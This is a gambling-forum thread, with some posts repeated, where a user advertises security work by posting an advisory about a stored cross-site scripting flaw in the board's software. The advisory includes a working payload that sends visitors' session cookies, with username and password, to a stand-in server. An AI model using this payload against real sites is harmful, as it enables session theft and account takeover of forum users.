Lander-
I figure that newbie is trying to self-promote that he can solve security problems. He had a previous post (which I copied above) asking for security work. He has admitted to working on his own software that he expects to be available for March Madness.
I think the selection of SBG for his post was due to newbie's ability to find a flaw in that particular software.
I figure that newbie is trying to self-promote that he can solve security problems. He had a previous post (which I copied above) asking for security work. He has admitted to working on his own software that he expects to be available for March Madness.
I think the selection of SBG for his post was due to newbie's ability to find a flaw in that particular software.
thanx java, seems you are seriosly guy,
anyways lander, that was in the past,
personally i put an eye on everything...
by the way, i dont know if sbg pays or not..
like java says, i just promoting my self,
how, telling security holes in different gambling softwares, imagine, fox example, this posting forum has a security hole, take a look....
Severity: Malicious users can steal session cookies, allowing
administrative
access to the bulletin board. Also custom html/js insertion in forum page
is possible
Problem:
The ubber cookie can be manually altered allowing to execute javascript
in the forum overview page and (latest posts overview page) and steal
cookies containing username, password and id. This is done by changing
the [displayed name] attribute and post a new topic on the board in the
following cookie
with the following code:
username<script>document.write('<img src%
3D"http://someserver/savereq.php?'%2Bdocument.cookie%2B'" width%3D0
height%3D0>')</script>
When posting a new topic on the forum that topic with your html/js is
rendered in the forum overview page. The html/js in the [displayed name]
gets a 0 width 0 height picture from a malicious server sending along the
ubber cookie contents to the server containing username and password.
fooling around with html/js in the [displayed name] attribute can cause
other things like automatic js redirection to logout page, distorting
forum and inserting custom html content
Fix.
the [displayed name] attribute should be filtered for any html tags
before rendering to page.
....
anyways,
just sad, knowing some books paid, 30dimes,
when i charge 2hundred for a unix firewall
anyways lander, that was in the past,
personally i put an eye on everything...
by the way, i dont know if sbg pays or not..
like java says, i just promoting my self,
how, telling security holes in different gambling softwares, imagine, fox example, this posting forum has a security hole, take a look....
Severity: Malicious users can steal session cookies, allowing
administrative
access to the bulletin board. Also custom html/js insertion in forum page
is possible
Problem:
The ubber cookie can be manually altered allowing to execute javascript
in the forum overview page and (latest posts overview page) and steal
cookies containing username, password and id. This is done by changing
the [displayed name] attribute and post a new topic on the board in the
following cookie
with the following code:
username<script>document.write('<img src%
3D"http://someserver/savereq.php?'%2Bdocument.cookie%2B'" width%3D0
height%3D0>')</script>
When posting a new topic on the forum that topic with your html/js is
rendered in the forum overview page. The html/js in the [displayed name]
gets a 0 width 0 height picture from a malicious server sending along the
ubber cookie contents to the server containing username and password.
fooling around with html/js in the [displayed name] attribute can cause
other things like automatic js redirection to logout page, distorting
forum and inserting custom html content
Fix.
the [displayed name] attribute should be filtered for any html tags
before rendering to page.
....
anyways,
just sad, knowing some books paid, 30dimes,
when i charge 2hundred for a unix firewall
Newbie-
A $200 unix firewall would not have stopped the DOS-attacks I assume you are referring to with the 30 dimes comment. The book's router comes before the firewall and the ISP's router before that.
Security is important and unix firewalls are great. However, the DOS attacks are a different problem.
A $200 unix firewall would not have stopped the DOS-attacks I assume you are referring to with the 30 dimes comment. The book's router comes before the firewall and the ISP's router before that.
Security is important and unix firewalls are great. However, the DOS attacks are a different problem.
